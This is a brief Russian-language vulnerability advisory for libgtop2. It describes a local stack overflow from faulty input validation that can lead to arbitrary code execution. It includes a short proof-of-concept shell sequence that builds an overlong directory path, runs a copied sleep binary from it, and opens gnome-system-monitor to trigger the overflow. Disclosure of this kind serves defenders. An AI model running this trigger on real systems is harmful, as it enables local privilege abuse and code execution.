Программа: libgtop2
Уязвимость позволяет локальному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных. Локальный атакующий может передать специально сформированные данные, что приведет к переполнению стека и выполнению произвольного кода.
Пример:
export dir=$(perl -e " print 's/'x1000;")
mkdir -p $dir
cp /bin/sleep $dir
$dir/sleep 100 &
gnome-system-monitor
